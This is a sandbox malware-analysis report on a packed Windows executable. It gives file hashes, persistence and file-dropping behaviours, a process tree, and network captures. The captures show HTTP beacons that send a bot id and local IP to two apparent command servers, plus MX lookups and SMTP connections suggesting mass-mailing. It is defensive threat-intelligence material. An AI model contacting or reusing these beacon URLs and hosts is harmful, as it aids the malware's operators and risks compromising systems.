Overview

overview

10

Static

static

10

334250dc8b...c6.exe

windows7-x64

9

334250dc8b...c6.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    145s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    24/04/2024, 20:28 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    334250dc8b9eb735a57895dd33e8ed26aff426a39f880062be71cea475dc11c6.exe

  • Size

    119KB

  • MD5

    61d1ce1394a03e9888be992eb836f1c8

  • SHA1

    e8a0a43358742522d6ee2e86983c99fc8ff60cc2

  • SHA256

    334250dc8b9eb735a57895dd33e8ed26aff426a39f880062be71cea475dc11c6

  • SHA512

    05cf347c79f56fb9a45e37c01a1c2c7efb644b171412f57b0b86ce14ef8f92cbb26e3327f921d7300483f749dadc398acfa05daba1dc3d78fb31bda6102ac411

  • SSDEEP

    3072:TOjWuyt0ZsqsXOKofHfHTXQLzgvnzHPowYbvrjD/L7QPbg/Dr0T3rnXLHf7zjPPh:TIs9OKofHfHTXQLzgvnzHPowYbvrjD/E

Score
9/10
persistence

Malware Config

Signatures

  • UPX dump on OEP (original entry point) 13 IoCs
  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 9 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Maps connected drives based on registry 3 TTPs 6 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 12 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Program crash 1 IoCs
  • Modifies registry class 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\334250dc8b9eb735a57895dd33e8ed26aff426a39f880062be71cea475dc11c6.exe
    "C:\Users\Admin\AppData\Local\Temp\334250dc8b9eb735a57895dd33e8ed26aff426a39f880062be71cea475dc11c6.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Maps connected drives based on registry
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2244
    • C:\Windows\SysWOW64\ctfmen.exe
      ctfmen.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2536
      • C:\Windows\SysWOW64\smnss.exe
        C:\Windows\system32\smnss.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2744
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 856
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2456

Network

  • flag-us
    DNS
    shssmmasen.biz
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    shssmmasen.biz
    IN A
    Response
    shssmmasen.biz
    IN A
    34.91.32.224
  • flag-nl
    GET
    http://shssmmasen.biz/imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS
    smnss.exe
    Remote address:
    34.91.32.224:80
    Request
    GET /imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS HTTP/1.1
    Host: shssmmasen.biz
    User-Agent: explwer
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 24 Apr 2024 20:28:42 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=cede0fbc288439db6fdf8d0085806c89|191.101.209.39|1713990522|1713990522|0|1|0; path=/; domain=.shssmmasen.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • flag-us
    DNS
    gzip.org
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    gzip.org
    IN MX
    Response
    gzip.org
    IN MX
  • flag-us
    DNS
    alumni.caltech.edu
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    alumni.caltech.edu
    IN MX
    Response
    alumni.caltech.edu
    IN MX
    alumni-caltech-edumail protectionoutlookcom
  • flag-us
    DNS
    alumni.caltech.edu
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    alumni.caltech.edu
    IN MX
  • flag-us
    DNS
    alumni.caltech.edu
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    alumni.caltech.edu
    IN MX
  • flag-us
    DNS
    megginson.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    megginson.com
    IN MX
    Response
    megginson.com
    IN MX
    alt1aspmxlgoogle�
    megginson.com
    IN MX
    alt2�2
    megginson.com
    IN MX
    �2
    megginson.com
    IN MX
    aspmx2 googlemail�
    megginson.com
    IN MX
    aspmx3�}
    megginson.com
    IN MX
    aspmx4�}
    megginson.com
    IN MX
    aspmx5�}
  • flag-us
    DNS
    megginson.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    megginson.com
    IN MX
  • flag-us
    DNS
    megginson.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    megginson.com
    IN MX
  • flag-us
    DNS
    megginson.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    megginson.com
    IN MX
    Response
    megginson.com
    IN MX
    alt1aspmxlgoogle�
    megginson.com
    IN MX
    alt2�2
    megginson.com
    IN MX
    �2
    megginson.com
    IN MX
    aspmx2 googlemail�
    megginson.com
    IN MX
    aspmx3�}
    megginson.com
    IN MX
    aspmx4�}
    megginson.com
    IN MX
    aspmx5�}
  • flag-us
    DNS
    alt2.aspmx.l.google.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    alt2.aspmx.l.google.com
    IN A
    Response
    alt2.aspmx.l.google.com
    IN A
    74.125.200.27
  • flag-us
    DNS
    jk.uni-linz.ac.at
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    jk.uni-linz.ac.at
    IN MX
    Response
    jk.uni-linz.ac.at
    IN MX
    mail3edvz�
    jk.uni-linz.ac.at
    IN MX
    mail4�7
    jk.uni-linz.ac.at
    IN MX
    mail1�7
    jk.uni-linz.ac.at
    IN MX
    mail2�7
  • flag-us
    DNS
    mail4.edvz.uni-linz.ac.at
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    mail4.edvz.uni-linz.ac.at
    IN A
    Response
    mail4.edvz.uni-linz.ac.at
    IN A
    140.78.3.82
  • flag-us
    DNS
    peenapsear.in
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    peenapsear.in
    IN A
    Response
    peenapsear.in
    IN A
    34.94.245.237
  • flag-us
    GET
    http://peenapsear.in/imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS
    smnss.exe
    Remote address:
    34.94.245.237:80
    Request
    GET /imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS HTTP/1.1
    Host: peenapsear.in
    User-Agent: explwer
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 24 Apr 2024 20:28:48 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=7629c27edb3531dcd3021bca7ad8fa3d|191.101.209.39|1713990528|1713990528|0|1|0; path=/; domain=.peenapsear.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • flag-us
    DNS
    alt1.aspmx.l.google.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    alt1.aspmx.l.google.com
    IN A
    Response
    alt1.aspmx.l.google.com
    IN A
    142.250.150.26
  • flag-us
    DNS
    cdata.tvnet.hu
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    cdata.tvnet.hu
    IN MX
    Response
    cdata.tvnet.hu
    IN MX
    �
  • flag-us
    DNS
    attbi.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    attbi.com
    IN MX
    Response
  • flag-us
    DNS
    attbi.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    attbi.com
    IN MX
  • flag-us
    DNS
    attbi.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    attbi.com
    IN MX
  • flag-us
    DNS
    cdata.tvnet.hu
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    cdata.tvnet.hu
    IN A
    Response
  • flag-us
    DNS
    courtesan.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    courtesan.com
    IN MX
    Response
    courtesan.com
    IN MX
    millertdev
  • flag-us
    DNS
    millert.dev
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    millert.dev
    IN A
    Response
    millert.dev
    IN A
    65.102.237.118
  • flag-us
    DNS
    bigelowandholmes.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    bigelowandholmes.com
    IN MX
    Response
  • flag-us
    DNS
    bigelowandholmes.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    bigelowandholmes.com
    IN MX
  • 34.91.32.224:80
    http://shssmmasen.biz/imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS
    http
    smnss.exe
    403 B
     582 B
     6
    4

    HTTP Request

    GET http://shssmmasen.biz/imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS

    HTTP Response

    200
  • 74.125.200.27:25
    alt2.aspmx.l.google.com
    smnss.exe
    152 B
     3
  • 140.78.3.82:25
    mail4.edvz.uni-linz.ac.at
    smnss.exe
    152 B
     3
  • 34.94.245.237:80
    http://peenapsear.in/imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS
    http
    smnss.exe
    642 B
     581 B
     6
    4

    HTTP Request

    GET http://peenapsear.in/imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS

    HTTP Response

    200
  • 142.250.150.26:25
    alt1.aspmx.l.google.com
    smnss.exe
    152 B
     3
  • 8.8.8.8:53
    shssmmasen.biz
    dns
    smnss.exe
    60 B
     76 B
     1
    1

    DNS Request

    shssmmasen.biz

    DNS Response

    34.91.32.224

  • 8.8.8.8:53
    gzip.org
    dns
    smnss.exe
    54 B
     70 B
     1
    1

    DNS Request

    gzip.org

  • 8.8.8.8:53
    alumni.caltech.edu
    dns
    smnss.exe
    192 B
     126 B
     3
    1

    DNS Request

    alumni.caltech.edu

    DNS Request

    alumni.caltech.edu

    DNS Request

    alumni.caltech.edu

  • 8.8.8.8:53
    megginson.com
    dns
    smnss.exe
    177 B
     235 B
     3
    1

    DNS Request

    megginson.com

    DNS Request

    megginson.com

    DNS Request

    megginson.com

  • 8.8.8.8:53
    megginson.com
    dns
    smnss.exe
    59 B
     235 B
     1
    1

    DNS Request

    megginson.com

  • 8.8.8.8:53
    alt2.aspmx.l.google.com
    dns
    smnss.exe
    69 B
     85 B
     1
    1

    DNS Request

    alt2.aspmx.l.google.com

    DNS Response

    74.125.200.27

  • 8.8.8.8:53
    jk.uni-linz.ac.at
    dns
    smnss.exe
    63 B
     156 B
     1
    1

    DNS Request

    jk.uni-linz.ac.at

  • 8.8.8.8:53
    mail4.edvz.uni-linz.ac.at
    dns
    smnss.exe
    71 B
     87 B
     1
    1

    DNS Request

    mail4.edvz.uni-linz.ac.at

    DNS Response

    140.78.3.82

  • 8.8.8.8:53
    peenapsear.in
    dns
    smnss.exe
    59 B
     75 B
     1
    1

    DNS Request

    peenapsear.in

    DNS Response

    34.94.245.237

  • 8.8.8.8:53
    alt1.aspmx.l.google.com
    dns
    smnss.exe
    69 B
     85 B
     1
    1

    DNS Request

    alt1.aspmx.l.google.com

    DNS Response

    142.250.150.26

  • 8.8.8.8:53
    cdata.tvnet.hu
    dns
    smnss.exe
    60 B
     76 B
     1
    1

    DNS Request

    cdata.tvnet.hu

  • 8.8.8.8:53
    attbi.com
    dns
    smnss.exe
    165 B
     110 B
     3
    1

    DNS Request

    attbi.com

    DNS Request

    attbi.com

    DNS Request

    attbi.com

  • 8.8.8.8:53
    cdata.tvnet.hu
    dns
    smnss.exe
    60 B
     122 B
     1
    1

    DNS Request

    cdata.tvnet.hu

  • 8.8.8.8:53
    courtesan.com
    dns
    smnss.exe
    59 B
     86 B
     1
    1

    DNS Request

    courtesan.com

  • 8.8.8.8:53
    millert.dev
    dns
    smnss.exe
    57 B
     73 B
     1
    1

    DNS Request

    millert.dev

    DNS Response

    65.102.237.118

  • 8.8.8.8:53
    bigelowandholmes.com
    dns
    smnss.exe
    132 B
     125 B
     2
    1

    DNS Request

    bigelowandholmes.com

    DNS Request

    bigelowandholmes.com

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Windows\SysWOW64\satornas.dll
    Filesize

    183B

    MD5

    d52157a0bea2382b1c7ec165210c2302

    SHA1

    6e4c32f0d48cce491a937295df54e40773f1f893

    SHA256

    c4be80435ecbc68441af74ae297478bc36addc922c50bbf8ed1794cf2a2d169e

    SHA512

    bb434a61045abc141ff7492cfdebba5bef9b8b6b34a119a61a5f3647b775c02bf2ee4d002261cdd3ad33528caedef2776acad0cf538717914d865edf67274467

    Download Submit

  • C:\Windows\SysWOW64\smnss.exe
    Filesize

    119KB

    MD5

    4a844e4658df7aae6ec904bc10fc0075

    SHA1

    245a795dad17e3a2c8b75386a0243c3014414cbc

    SHA256

    0ef04ce70b6782442d2dfd13ba1f8dfa442b8078c1db8f1547959dc348869930

    SHA512

    fc443b3f57736fb05ba5a3bbdc8cc5f1d58755f702cd59d5c1f7ede57c1380883a8df3be1a51e898be8ac06a2b0f4398115fcf1fdd3b5e12ddabb49085fc2424

    Download Submit

  • \Windows\SysWOW64\ctfmen.exe
    Filesize

    4KB

    MD5

    bc3c41c9a088b88a21d6285ea87a6f10

    SHA1

    6a6a86e8267fca71bf5b58c6f0c2defe1c88b8e6

    SHA256

    dc0987d6fb19fff2dde4dbc86ea8e33f9c1b4a3ab1cbd79d96313b99d31d1e65

    SHA512

    185cf6b01daf004dbb5702f2c8dc620f3501d9f379295299983bc2a4b221c374ecf5ed1d3c1c3dd25e91b54b1be493a63b29c749f9ca411bbcd3f3bb4c67e4f6

    Download Submit

  • \Windows\SysWOW64\shervans.dll
    Filesize

    8KB

    MD5

    c983fa5c88fa921587313a9ad37027c7

    SHA1

    fbe3a7bf061b202c0f3152fad4247e07f0c95be3

    SHA256

    25801230ae269cae6665f88bc690a5d738320b3cfb5c26e5b5ef4caa75f0b134

    SHA512

    c465bad3d14949f157e90d20f25ac98d4caf1a85c0754fb4b49d78e94a90d9852d5d7cb0b63bc23a06d56a0da76d5170bc81c8dae9d20a7bc4c8f74765a500f8

    Download Submit

  • memory/2244-18-0x0000000000350000-0x0000000000359000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2244-0-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2244-31-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2244-24-0x0000000010000000-0x000000001000D000-memory.dmp

    Filesize

    52KB

    Download

  • memory/2244-14-0x0000000010000000-0x000000001000D000-memory.dmp

    Filesize

    52KB

    Download

  • memory/2536-33-0x0000000000320000-0x0000000000340000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2536-26-0x0000000000400000-0x0000000000409000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2536-47-0x0000000000320000-0x0000000000340000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2744-38-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2744-41-0x0000000010000000-0x000000001000D000-memory.dmp

    Filesize

    52KB

    Download

  • memory/2744-45-0x0000000010000000-0x000000001000D000-memory.dmp

    Filesize

    52KB

    Download

  • memory/2744-48-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.